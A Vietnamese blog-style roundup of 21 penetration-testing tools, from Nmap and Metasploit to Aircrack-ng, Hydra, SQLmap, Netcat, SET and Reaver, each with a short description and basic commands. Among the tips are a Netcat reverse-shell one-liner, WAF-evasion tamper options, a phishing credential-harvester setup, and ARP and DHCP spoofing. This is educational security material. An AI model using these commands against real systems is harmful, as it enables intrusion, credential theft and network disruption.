
Dạo gần đây mình có thử nghịch mấy công cụ bảo mật, thấy cái nào cũng hay ho nên tổng hợp lại ở đây cho dễ tra. Ai mới vọc vào mảng này mà chưa biết bắt đầu từ đâu thì thử nghía qua, mỗi công cụ mình để kèm theo mô tả ngắn và cách chạy cơ bản, cài vào nghịch phát là hiểu liền. Không lý thuyết nhiều, chủ yếu là thực hành thôi.
1. Nmap (Network Mapper)
Kiến thức cốt lõi:
Nmap không chỉ quét cổng mà còn cung cấp thông tin chi tiết về hệ điều hành, phiên bản dịch vụ, và cấu hình mạng. Điểm mạnh nằm ở khả năng tùy chỉnh quét (scan types) và né tránh phát hiện (evasion). Lệnh -A
mạnh nhưng chậm, nên tùy tình huống, bạn có thể dùng các tùy chọn như -sS
(TCP SYN scan) để quét nhanh hoặc -sU
cho UDP.
- Giá trị chính: Khám phá mạng (network discovery) và lập bản đồ mục tiêu (target mapping).
- Mẹo thực hành: Sử dụng
--script
để chạy các script NSE (Nmap Scripting Engine) nhưnmap --script vuln <target_ip>
để quét lỗ hổng. - Lưu ý: Quét không được phép trên mạng không sở hữu có thể vi phạm pháp luật.
Cách sử dụng:
Lệnh này thực hiện quét nâng cao, thu thập thông tin hệ điều hành, dịch vụ, và phiên bản.
nmap -A <target_ip>
2. Metasploit Framework
Kiến thức cốt lõi:
Metasploit là trung tâm của kiểm thử xâm nhập nhờ kho exploit khổng lồ và khả năng tùy chỉnh payload. Giá trị cốt lõi nằm ở quy trình: tìm kiếm exploit (search
), cấu hình (set
), và khai thác (exploit
). Payload như meterpreter
cho phép kiểm soát hệ thống từ xa với các lệnh mạnh mẽ (upload, download, keylogger).
- Giá trị chính: Khai thác lỗ hổng nhanh chóng và tự động hóa kiểm thử.
- Mẹo thực hành: Dùng
use auxiliary/scanner
để quét trước khi khai thác, ví dụ:use auxiliary/scanner/smb/smb_version
để kiểm tra dịch vụ SMB. - Lưu ý: Cập nhật thường xuyên (
msfupdate
) để có exploit mới nhất.
Cách sử dụng:
msfconsole
Sau khi mở giao diện, bạn có thể tìm kiếm các khai thác bằng:
search exploit <tên dịch vụ>
3. Wireshark
Kiến thức cốt lõi:
Wireshark cho phép phân tích lưu lượng mạng theo thời gian thực, với sức mạnh nằm ở bộ lọc (filter) như http
, tcp.port == 80
, hoặc ip.src == <IP>
. Nó giúp phát hiện các gói tin bất thường (malicious traffic) hoặc phân tích giao thức chi tiết.
- Giá trị chính: Phát hiện tấn công mạng (MITM, packet injection) và debug giao thức.
- Mẹo thực hành: Dùng bộ lọc hiển thị (
http.request
) để tập trung vào lưu lượng HTTP hoặc lưu file pcap để phân tích sau. - Lưu ý: Cần hiểu cơ bản về giao thức mạng (TCP/IP, HTTP) để phân tích hiệu quả.
Cách sử dụng:
wireshark
Chọn giao diện mạng để bắt đầu thu thập gói tin.
4. Aircrack-ng
Kiến thức cốt lõi:
Aircrack-ng phá khóa Wi-Fi (WEP/WPA) bằng cách bắt handshake và brute force. Giá trị nằm ở bộ công cụ tích hợp: airmon-ng
(chuyển card mạng sang chế độ monitor), airodump-ng
(bắt gói tin), và aircrack-ng
(phá khóa).
- Giá trị chính: Kiểm tra bảo mật Wi-Fi và khai thác điểm yếu giao thức.
- Mẹo thực hành: Dùng
airodump-ng --bssid <BSSID> --channel <channel> wlan0mon
để tập trung vào một AP cụ thể, tiết kiệm thời gian. - Lưu ý: Chỉ sử dụng trên mạng bạn có quyền, vì tấn công Wi-Fi trái phép là bất hợp pháp.
Cách sử dụng:
airmon-ng start wlan0
airodump-ng wlan0mon
5. Hydra
Kiến thức cốt lõi:
Hydra là công cụ brute force nhanh, hỗ trợ nhiều giao thức (SSH, FTP, HTTP). Giá trị nằm ở khả năng tùy chỉnh danh sách mật khẩu (-P
) và tài khoản (-L
), cùng tốc độ song song hóa cao.
- Giá trị chính: Kiểm tra độ mạnh của mật khẩu dịch vụ.
- Mẹo thực hành: Dùng
-t 4
để giới hạn số luồng, tránh khóa tài khoản do thử quá nhanh. - Lưu ý: Brute force dễ bị phát hiện bởi IDS/IPS, nên thử trên môi trường kiểm soát.
Cách sử dụng:
hydra -l admin -P passwords.txt <target_ip> ssh
6. John the Ripper
Kiến thức cốt lõi: John phá mật khẩu bằng cách thử từ điển (wordlist) hoặc biến đổi thông minh (rules). Giá trị nằm ở khả năng xử lý nhiều định dạng hash (MD5, SHA, NTLM) và tối ưu tốc độ trên CPU.
- Giá trị chính: Phục hồi mật khẩu từ file hash bị rò rỉ.
- Mẹo thực hành: Dùng
--format=<hash_type>
để chỉ định loại hash, ví dụ:john --format=md5crypt hashfile
. - Lưu ý: Kết hợp với wordlist chất lượng (như rockyou.txt) để tăng hiệu quả.
Cách sử dụng:
john --wordlist=password.lst hashfile
7. SQLmap
Kiến thức cốt lõi:
SQLmap tự động hóa khai thác SQL Injection, từ phát hiện lỗ hổng đến trích xuất dữ liệu (database, tables, columns). Giá trị nằm ở các tùy chọn như --dbs
, --dump
, và khả năng vượt qua WAF.
- Giá trị chính: Kiểm tra bảo mật ứng dụng web.
- Mẹo thực hành: Dùng
--tamper
(nhưtamper=space2comment
) để né các bộ lọc WAF. - Lưu ý: Chỉ thử trên mục tiêu được phép, vì khai thác SQL Injection có thể gây hại.
Cách sử dụng:
sqlmap -u "http://target.com/page.php?id=1" --dbs
8. Burp Suite
Kiến thức cốt lõi: Burp Suite là công cụ all-in-one cho kiểm thử web, với Proxy (chặn và sửa request), Scanner (quét lỗ hổng), và Intruder (brute force). Giá trị nằm ở khả năng tùy chỉnh request và phân tích phản hồi.
- Giá trị chính: Phát hiện lỗ hổng web (XSS, CSRF, SQLi).
- Mẹo thực hành: Cấu hình Proxy trên trình duyệt và dùng Intruder để thử các payload (ví dụ: danh sách ID).
- Lưu ý: Phiên bản Community miễn phí đủ dùng, nhưng Scanner chỉ có trong bản Pro.
Cách sử dụng:
burpsuite
9. Nikto
Kiến thức cốt lõi: Nikto quét máy chủ web để tìm cấu hình sai, lỗ hổng phổ biến, và file nhạy cảm. Giá trị nằm ở tốc độ và cơ sở dữ liệu lỗ hổng tích hợp.
- Giá trị chính: Kiểm tra nhanh bảo mật máy chủ web.
- Mẹo thực hành: Dùng
-Tuning
để tùy chỉnh loại quét, ví dụ:nikto -h target.com -Tuning x
để bỏ qua kiểm tra không cần thiết. - Lưu ý: Nikto tạo nhiều request, dễ bị phát hiện bởi WAF.
Cách sử dụng:
nikto -h http://target.com
10. Netcat
Kiến thức cốt lõi: Netcat là “con dao Thụy Sĩ” của mạng, cho phép tạo kết nối TCP/UDP, chuyển file, hoặc tạo shell ngược. Giá trị nằm ở sự đơn giản và linh hoạt.
- Giá trị chính: Kiểm tra cổng và thiết lập kết nối từ xa.
- Mẹo thực hành: Dùng
nc -e /bin/sh <ip> <port>
để tạo shell (trên Linux). - Lưu ý: Một số hệ thống giới hạn
nc
, cần kiểm tra trước.
Cách sử dụng:
nc -lvp 4444
11. TheHarvester
Kiến thức cốt lõi: TheHarvester thu thập email, subdomain, và thông tin OSINT từ Google, Bing, Shodan. Giá trị nằm ở khả năng lập bản đồ mục tiêu trước khi tấn công.
- Giá trị chính: Tăng hiệu quả reconnaissance (thu thập thông tin).
- Mẹo thực hành: Dùng
-b all
để quét từ nhiều nguồn, ví dụ:theharvester -d target.com -b all
. - Lưu ý: Tôn trọng chính sách của công cụ tìm kiếm để tránh bị chặn.
Cách sử dụng:
theharvester -d target.com -b google
12. Maltego
Kiến thức cốt lõi: Maltego trực quan hóa mối quan hệ giữa các thực thể (email, domain, IP) qua đồ thị. Giá trị nằm ở các transform (chuyển đổi dữ liệu) để khám phá thông tin ẩn.
- Giá trị chính: Phân tích OSINT chuyên sâu.
- Mẹo thực hành: Bắt đầu với domain, dùng transform như “To Emails” để tìm email liên quan.
- Lưu ý: Phiên bản miễn phí giới hạn số transform, cần đăng ký để dùng đầy đủ.
Cách sử dụng:
maltego
13. WPScan
Kiến thức cốt lõi:
WPScan chuyên quét lỗ hổng WordPress (plugin, theme, user). Giá trị nằm ở cơ sở dữ liệu lỗ hổng và khả năng liệt kê user (--enumerate u
).
- Giá trị chính: Kiểm tra bảo mật website WordPress.
- Mẹo thực hành: Dùng
--api-token
để tăng giới hạn quét với API miễn phí. - Lưu ý: Chỉ quét mục tiêu được phép để tránh vi phạm.
Cách sử dụng:
wpscan --url http://target.com --enumerate vp
14. SET (Social Engineering Toolkit)
Kiến thức cốt lõi: SET tự động hóa tấn công kỹ thuật xã hội như giả mạo website hoặc email phishing. Giá trị nằm ở các template sẵn có và tích hợp với Metasploit.
- Giá trị chính: Kiểm tra nhận thức bảo mật của người dùng.
- Mẹo thực hành: Dùng “Website Attack Vectors” và chọn “Credential Harvester” để giả mạo login page.
- Lưu ý: Cần môi trường thử nghiệm hợp pháp.
Cách sử dụng:
setoolkit
15. Ettercap
Kiến thức cốt lõi: Ettercap thực hiện MITM qua ARP spoofing hoặc DNS spoofing. Giá trị nằm ở khả năng chặn và sửa gói tin trong mạng nội bộ.
- Giá trị chính: Kiểm tra bảo mật mạng LAN.
- Mẹo thực hành: Dùng
-M arp:remote
để spoof cả gateway và mục tiêu. - Lưu ý: Cần quyền root và hiểu cấu trúc mạng.
Cách sử dụng:
ettercap -G
16. Yersinia
Kiến thức cốt lõi: Yersinia tấn công các giao thức layer 2 (STP, DHCP, VLAN). Giá trị nằm ở khả năng phá vỡ cấu trúc mạng hoặc thu thập thông tin.
- Giá trị chính: Kiểm tra bảo mật giao thức mạng.
- Mẹo thực hành: Dùng
yersinia dhcp -attack 1
để gửi DHCP giả mạo. - Lưu ý: Dùng cẩn thận vì có thể làm gián đoạn mạng.
Cách sử dụng:
yersinia -G
17. Fierce
Kiến thức cốt lõi: Fierce quét DNS để tìm subdomain và IP liên quan. Giá trị nằm ở khả năng phát hiện các máy chủ ẩn trong mạng mục tiêu.
- Giá trị chính: Thu thập thông tin mạng trước tấn công.
- Mẹo thực hành: Dùng
--wordlist
để brute force subdomain. - Lưu ý: Kết hợp với TheHarvester để có kết quả toàn diện.
Cách sử dụng:
fierce -dns target.com
18. Hashcat
Kiến thức cốt lõi: Hashcat là công cụ phá hash nhanh nhất nhờ tận dụng GPU. Giá trị nằm ở hỗ trợ nhiều thuật toán (-m) và các chế độ tấn công (dictionary, mask, hybrid).
- Giá trị chính: Phục hồi mật khẩu từ hash.
- Mẹo thực hành: Dùng
-a 3
để brute force với mask, ví dụ:hashcat -m 0 -a 3 hashfile ?d?d?d?d
. - Lưu ý: Cần GPU mạnh để tối ưu tốc độ.
Cách sử dụng:
hashcat -m 0 hashfile rockyou.txt
19. Exploit Database (searchsploit)
Kiến thức cốt lõi: Searchsploit tìm kiếm exploit từ cơ sở dữ liệu Exploit-DB. Giá trị nằm ở tốc độ truy cập offline và khả năng lọc theo nền tảng/dịch vụ.
- Giá trị chính: Nghiên cứu exploit nhanh chóng.
- Mẹo thực hành: Dùng
-p
để xem chi tiết exploit, ví dụ:searchsploit -p apache
. - Lưu ý: Kiểm tra exploit trước khi dùng, vì một số có thể không ổn định.
Cách sử dụng:
searchsploit apache
20. Reaver
Kiến thức cốt lõi: Reaver khai thác WPS để lấy khóa Wi-Fi WPA/WPA2. Giá trị nằm ở khả năng phá khóa mà không cần handshake.
- Giá trị chính: Kiểm tra bảo mật WPS.
- Mẹo thực hành: Dùng
-S
để giảm lỗi khi tấn công, ví dụ:reaver -i wlan0mon -b <BSSID> -S
. - Lưu ý: WPS hiện ít được dùng, nên kiểm tra trước.
Cách sử dụng:
reaver -i wlan0mon -b <BSSID> -vv
21. Armitage
Kiến thức cốt lõi: Armitage cung cấp giao diện đồ họa cho Metasploit, giúp trực quan hóa mạng và tự động hóa khai thác. Giá trị nằm ở khả năng quản lý nhiều session cùng lúc.
- Giá trị chính: Tăng tốc kiểm thử xâm nhập.
- Mẹo thực hành: Dùng “Attacks” để tìm exploit tự động sau khi quét mạng.
- Lưu ý: Yêu cầu Metasploit cài sẵn.
Cách sử dụng:
armitage
Trên đây là mấy công cụ mình hay gặp khi tìm hiểu về bảo mật, từ mấy cái đơn giản tới mấy món hardcore hơn một chút. Không cần nhớ hết đâu, cứ lưu lại rồi khi nào cần thì lôi ra thử. Quan trọng nhất là chịu khó vọc, sai cũng được, miễn là học được gì đó.